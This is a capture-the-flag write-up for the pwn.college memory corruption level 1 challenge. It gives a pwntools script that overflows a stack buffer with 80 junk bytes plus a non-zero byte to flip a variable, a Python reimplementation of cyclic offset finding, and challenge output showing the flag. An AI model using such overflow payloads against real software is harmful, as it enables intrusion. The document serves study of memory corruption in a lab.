pwn.college Memory Corruption [level1]

Dec. 10, 2020 // echel0n

This is a very primitive solution for reading the flag of the level 1 challenge. The challenge requires you to overwrite a variable that exists in memory. The variable is zero by default, and you have to overwrite it with something else. You can calculate where the variable sits in memory with the pwn.cyclic and pwn.cyclic_find functions. In my example, it was 80 bytes after the input address. So we need 80 junk bytes (in fact all 80 junk bytes can be non-zero as well) followed by 1 byte that is not 0x00. You can create the final payload like this.

  #!/usr/bin/env python
  import pwn

  def create_payload():
      # Write the payload to a file so it can also be piped into the binary by hand.
      f = open("payload", "wb")
      buffer_size = b"200\n"
      stonks = b"A" * 80 + b"\x01" + b"\n"   # 80 junk bytes, then one non-zero byte
      itself = buffer_size + stonks
      f.write(itself)
      f.close()
      pwn.context.terminal = ["alacritty", "-x", "sh", "-c"]
      binary_itself = pwn.ELF("babymem_level1_teaching1")
      r = pwn.process("./babymem_level1_teaching1")
      # Wait for each prompt instead of a fixed-size read, which can return early.
      epi = r.recvuntil(b"Payload size:")
      print(epi.decode("utf-8"))
      r.sendline(b"200")                     # pwntools expects bytes, not str
      r.recvuntil(b"Send your payload")
      r.sendline(b"A" * 80 + b"\x01")        # same 80-byte offset as in the payload file
      pro = r.recvall(timeout=2)
      print(pro.decode("utf-8"))
      a = input("\n\nEND?")

  create_payload()
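The offset calculation the post relies on (pwn.cyclic and pwn.cyclic_find) is easy to use without understanding why it works. The example below is added here and is not code from the original post or from pwntools: it reimplements the two functions in plain Python (same lowercase alphabet and 4-byte window as the pwntools defaults) and runs them against a constructed, hypothetical stack-frame model, SimulatedFrame, in which the target variable sits 80 bytes after the input buffer, the value the post reports for its example. The real binary's layout is not known to this example; the frame, its size and the probe length are assumptions.

```python
#!/usr/bin/env python3
"""Pure-Python stand-in for pwn.cyclic / pwn.cyclic_find, plus a constructed
memory model, to show how the 80-byte offset in the write-up is found.
Hypothetical example code, not part of the original post or of pwntools."""
import string

ALPHABET = string.ascii_lowercase  # pwntools' default alphabet
N = 4                              # pwntools' default window size


def cyclic(length, alphabet=ALPHABET, n=N):
    """Return the first `length` bytes of the de Bruijn sequence B(k, n).

    Every n-byte window of the sequence is unique, so whichever n bytes end up
    in a corrupted variable identify exactly where in the input they came from.
    Generated with the standard FKM algorithm, cut off once `length` is reached.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    if len(out) >= length:
                        return
                    out.append(ord(alphabet[i]))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic_find(subseq, alphabet=ALPHABET, n=N, limit=100_000):
    """Offset of an n-byte window inside the sequence, or -1 if it is not in
    the first `limit` bytes (e.g. the variable was never reached)."""
    if len(subseq) != n:
        raise ValueError("subseq must be exactly %d bytes" % n)
    return cyclic(limit, alphabet, n).find(subseq)


class SimulatedFrame:
    """Constructed stand-in for the challenge's frame (assumption, not the real
    layout): an input buffer followed, `var_offset` bytes later, by the 4-byte
    variable that must become non-zero."""

    def __init__(self, var_offset=80, size=96):
        self.var_offset = var_offset
        self.mem = bytearray(size)

    def send(self, payload):
        # Bounded copy: bytes past the end of the frame are dropped.
        n = min(len(payload), len(self.mem))
        self.mem[:n] = payload[:n]

    def variable(self):
        return int.from_bytes(self.mem[self.var_offset:self.var_offset + 4], "little")


def find_offset(frame, probe_len=200):
    """Step 1 of the post: send a cyclic pattern, read back what landed in the
    variable, and ask cyclic_find where those bytes sat in the pattern."""
    frame.send(cyclic(probe_len))
    landed = frame.variable().to_bytes(4, "little")
    return cyclic_find(landed)


def build_payload(offset):
    """Step 2 of the post: `offset` junk bytes, then one non-zero byte."""
    return b"A" * offset + b"\x01"


if __name__ == "__main__":
    frame = SimulatedFrame()
    off = find_offset(frame)
    print("variable is", off, "bytes after the input buffer")
    fresh = SimulatedFrame()
    fresh.send(build_payload(off))
    print("variable after payload:", fresh.variable())
```

cyclic_find returns -1 when the bytes it is given are all zero, which is what you see when the probe was too short to reach the variable; lengthen the probe rather than guessing an offset. Note also, from the session output in the post, that "You win!" is printed before "*** stack smashing detected ***": the stack canary only fires when the function returns, so it catches the overflow after the overwritten variable has already been checked.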

Warning: sendfile() has issues. If you want to input your payload manually, do it like this.

  $ ./binary.bin < ./payload | cat
  [*] '/mnt/pwn.college/mem_corrupt/level00_1/babymem_level1_testing1'
      Arch:     amd64-64-little
      RELRO:    Full RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      PIE enabled
  [+] Starting local process './babymem_level1_testing1': pid 2057309
  ###
  ### Welcome to ./babymem_level1_testing1!
  ###
  Payload size:
  Send your payload (up to 200 bytes)!
  You win! Here is your flag:
  pwn_college{example_flag}
  Goodbye!
  *** stack smashing detected ***: terminated